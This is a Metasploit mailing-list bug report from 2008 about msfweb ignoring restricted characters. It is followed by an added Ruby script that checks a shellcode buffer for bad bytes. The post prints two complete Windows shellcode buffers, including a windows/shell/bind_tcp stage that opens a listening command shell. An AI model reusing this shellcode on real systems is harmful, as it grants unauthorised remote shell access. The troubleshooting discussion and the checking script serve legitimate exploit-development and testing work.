Metasploit mailing list archives

Msfweb: Payload doesn't recognize badchars?


From: spinbad.security at googlemail.com (spin bad)
Date: Mon, 17 Nov 2008 21:49:27 +0100

Hi list

I try to create a payload via the msfweb interface. I use the following value for the restricted characters field:

0x00 0x20 0xc9


However, the following payload was generated (notice the second hex value):

unsigned char buf[] =
"\x33\xc9\x83\xe9\xb3\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x13\x8c\xc9\x29\x83\xee\xfc\xe2\xf4\xef\x64\x9f\x29\x13\x8c"
"\x9a\x7c\x45\xdb\x42\x45\x37\x94\x42\x6c\x2f\x07\x9d\x2c\x6b"
"\x8d\x23\xa2\x59\x94\x42\x73\x33\x8d\x22\xca\x21\xc5\x42\x1d"
"\x98\x8d\x27\x18\xec\x70\xf8\xe9\xbf\xb4\x29\x5d\x14\x4d\x06"
"\x24\x12\x4b\x22\xdb\x28\xf0\xed\x3d\x66\x6d\x42\x73\x37\x8d"
"\x22\x4f\x98\x80\x82\xa2\x49\x90\xc8\xc2\x98\x88\x42\x28\xfb"
"\x67\xcb\x18\xd3\xd3\x97\x74\x48\x4e\xc1\x29\x4d\xe6\xf9\x70"
"\x77\x07\xd0\xa2\x48\x80\x42\x72\x0f\x07\xd2\xa2\x48\x84\x9a"
"\x41\x9d\xc2\xc7\xc5\xec\x5a\x40\xee\x40\xe4\x9d\xe3\xbc\x1d"
"\x36\xff\x92\x60\xc9\x28\x13\x8c\x99\x7e\x45\xdf\x40\xcc\xfb"
"\xab\xc9\x29\x13\x1c\xc8\x29\x13\x3a\xd0\x31\xf4\x6b\xb0\xef"
"\x6a\x69\x80\xaf\x5a\x28\xd3\x59\xd4\x28\x64\x07\xfa\x55\xc0"
"\xdc\xbe\x47\x24\xd5\x28\xfb\xba\x1b\x4c\xbf\xfb\x29\x48\x01"
"\x82\x09\x42\x73\x1e\xa0\xcc\x05\x0a\xa4\x66\x98\xa3\x2e\x4a"
"\xdd\x9a\xd6\x27\x03\x36\x7c\x17\xd5\x40\x2d\x9d\x6e\x3b\x02"
"\x34\xd8\x36\x1e\xec\xd9\xf9\x18\xd3\xdc\x99\x79\x43\xcc\x99"
"\x69\x43\x73\x9c\x05\x9a\x4b\xf8\xf2\x40\xdf\xa1\x2b\x13\x9d"
"\x95\xa0\xf3\xe6\xd9\x79\x44\x73\x9c\x0d\x40\xdb\x36\x7c\x3b"
"\xdf\x9d\x7e\xec\xd9\xe9\x7a\x44\x05\x0e\xd6\x46\x90\xa3\x69"
"\x4d\xda\x08\xcf\x15\xda\x08\xcf\x1b\xda\xa3\x29\xec\xd9\xc5"
"\xa0\xd0\xe6\xc9\x41\x13\x9c\xc9\x29\x40\xdb\x36\x7c\x0b\x73"
"\x1a\x29";

/*
 * windows/shell/bind_tcp - 474 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] =
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"
"\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01"
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b"
"\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"
"\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c"
"\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53"
"\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19"
"\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08"
"\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee"
"\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53"
"\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a"
"\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d"
"\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83"
"\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc"
"\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72"
"\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4"
"\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0"
"\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07"
"\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74"
"\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75"
"\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff"
"\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00"
"\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9"
"\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75"
"\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20"
"\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"
"\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3";

Is this a bug or did I just do something wrong?

Regards

spinbad
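A quick way to verify what the poster noticed is to run the generated buffer through a bad-character check. The Ruby below is an added example, not code from the original post or from Metasploit: it parses the C-style `"\xNN"` array msfweb emits and the space-separated `0x..` list from the restricted characters field, then reports every offset whose byte is in that list (decoder stub included, since every byte of the output has to survive). The sample input is the first two lines of the first buffer quoted above.

```ruby
require 'set'

# Parse the msfweb "restricted characters" field, e.g. "0x00 0x20 0xc9",
# into an array of integer byte values.
def parse_badchars(field)
  field.split.map(&:hex)
end

# Extract the bytes from a C unsigned char array written as "\xNN" escapes.
# Anything that is not a \xNN escape (declaration, quotes, ';') is ignored.
def parse_c_buf(src)
  src.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |h| h.to_i(16) }
end

# Return [[offset, byte], ...] for every byte present in the bad-char set.
def find_badchars(bytes, badchars)
  bad = badchars.to_set
  bytes.each_with_index
       .select { |b, _| bad.include?(b) }
       .map    { |b, i| [i, b] }
end

# Convenience wrapper: check a generated buffer against the msfweb field and
# return a small report hash (total bytes, hits, whether the payload is clean).
def check_payload(src, field)
  bytes = parse_c_buf(src)
  hits  = find_badchars(bytes, parse_badchars(field))
  { size: bytes.length, hits: hits, clean: hits.empty? }
end

# Constructed sample: the first two lines of the payload quoted in the post.
# Single-quoted heredoc keeps the "\x.." escapes as literal text.
SAMPLE = <<~'C'
  unsigned char buf[] =
  "\x33\xc9\x83\xe9\xb3\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  "\x13\x8c\xc9\x29\x83\xee\xfc\xe2\xf4\xef\x64\x9f\x29\x13\x8c";
C

if __FILE__ == $PROGRAM_NAME
  report = check_payload(SAMPLE, "0x00 0x20 0xc9")
  puts "#{report[:size]} bytes, clean=#{report[:clean]}"
  report[:hits].each do |off, b|
    puts format("  offset %4d: 0x%02x is a restricted character", off, b)
  end
end
```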